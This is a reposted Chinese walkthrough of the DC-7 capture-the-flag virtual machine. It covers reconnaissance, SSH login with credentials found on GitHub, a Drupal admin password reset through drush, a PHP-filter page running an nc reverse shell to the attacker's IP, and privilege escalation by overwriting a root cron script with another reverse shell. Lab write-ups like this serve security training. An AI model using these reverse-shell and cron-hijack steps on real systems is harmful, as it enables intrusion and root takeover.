當前位置：首頁 > 人文社科 > 生活经验 >内容正文

生活经验

DC7靶机渗透测试

發布時間：2023/11/28 生活经验 28 豆豆

生活随笔收集整理的這篇文章主要介紹了 DC7靶机渗透测试小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

文章目錄

- - 環境版本：
  - 一、信息收集
  - - 1.主機發現
    - 2.端口掃描
  - 二、漏洞掃描/利用
  - - 1.訪問靶機 web 服務
    - 2.信息收集
    - 3.ssh 連接
    - 4.查看文件權限
    - 5.查看文件內容
    - 7.利用框架漏洞
    - 8.安裝 PHP 插件
    - 10.漏洞利用
  - 總結：

環境版本：

VMware pro 16
Kali 2021.1(虛擬機)
DC-7(虛擬機)

一、信息收集

1.主機發現

arp-scan -l

發現靶機 ip：192.168.1.126

2.端口掃描

發現其開放了 22 ssh、80 web drupal

二、漏洞掃描/利用

1.訪問靶機 web 服務

DC-7介紹了一些“新”概念，但我將讓您了解它們是什么。:-) 
雖然這個挑戰并不是所有的技術性的，如果你需要訴諸暴力或字典攻擊，你可能不會成功。 
你要做的是“外面”去想。 
在盒子外面。:-)

得到提示，技術難度相對簡單，類似解謎
發現末尾有留下名字/昵稱

2.信息收集

搜索 DC7USER 發現其在 github 上有項目

<?php$servername = "localhost";$username = "dc7user";$password = "MdR3xOgB7#dW";$dbname = "Staff";$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

在 config.php 發現 mysql 數據庫連接 PHP 腳本，但是端口掃描時沒有發現 mysql 開放端口，嘗試將其賬號密碼進行 ssh 連接

3.ssh 連接

ssh dc7user@192.168.1.126 
MdR3xOgB7#dW

登陸成功，發現提示你有一個新郵件
查看郵件內容：

cd /var/mail

dc7user@dc-7:/var/mail$ cat dc7user 
From root@dc-7 Fri Apr 09 18:00:09 2021
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 09 Apr 2021 18:00:09 +1000
Received: from root by dc-7 with local (Exim 4.89)(envelope-from <root@dc-7>)id 1lUm3l-0000I3-E6for root@dc-7; Fri, 09 Apr 2021 18:00:09 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1lUm3l-0000I3-E6@dc-7>
Date: Fri, 09 Apr 2021 18:00:09 +1000rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]From root@dc-7 Fri Apr 09 18:15:06 2021
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 09 Apr 2021 18:15:06 +1000
Received: from root by dc-7 with local (Exim 4.89)(envelope-from <root@dc-7>)id 1lUmIE-0000J5-1Yfor root@dc-7; Fri, 09 Apr 2021 18:15:06 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1lUmIE-0000J5-1Y@dc-7>
Date: Fri, 09 Apr 2021 18:15:06 +1000Database dump saved to /home/dc7user/backups/website.sql               [success]dc7user@dc-7:/var/mail$

發現是以 root 權限執行的計劃任務：每15分鐘執行一次 /opt/scripts/backups.sh
若是對該文件有寫權限，則可以直接提權

4.查看文件權限

ls -l /opt/scripts/backups.sh

發現莫得權限，root、www-data 的權限都是 7，當前用戶只有 rx 權限，結合開放的 80 端口嘗試使用其進行彈 shell

5.查看文件內容

cat /opt/scripts/backups.sh

發現 drush，命令，嘗試使用其更改 drupal 默認用戶 admin 密碼

cd /var/www/html/sites/default 
drush user-password admin --password="passwd"    #將admin用戶密碼更改為passwd

更改成功，登入后臺嘗試使用 PHP 代碼執行 nc 連接

7.利用框架漏洞

進入后臺 -> content -> add content -> basic page

查看文件類型，發現無法保存為 PHP，應該是沒加載或安裝 PHP，查看發現沒有安裝

8.安裝 PHP 插件

在后臺添加模塊 PHP

進入后將如下鏈接填入，點擊 install 下載

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

完成后啟用該模塊，點擊 enable nwely added modules 進入新頁面，找到 PHP filter 勾選，滑到最后點擊 install

成功加載

9.使用 PHP 模塊進行 nc 連接
1)攻擊機監聽

nc -lvvp 1234

2)靶機 nc 彈shell
在 content -> addcontent -> basic page 中構造 shell php 頁面

<?php system("nc -e /bin/sh 192.168.1.123 1234"); ?>

點擊 preview 預覽即可執行 nc 連接

得到 shell：

10.漏洞利用

1)攻擊機 nc 監聽

nc -lvvp 9999

2)更改計劃執行任務內容

cd /opt/scripts 
echo "nc -e /bin/sh 192.168.1.123 9999" >backups.sh 
cat backups.sh

因為 15 分鐘執行一次，等待 15 分鐘
若是咱們自己手動執行則會以手動執行的權限彈 shell

11.查看計劃任務間隔

發現其為每 15 分鐘執行一次

總結：

結合了社工
框架漏洞/利用相當危險
計劃任務權限要謹慎對待

總結

以上是生活随笔為你收集整理的DC7靶机渗透测试的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。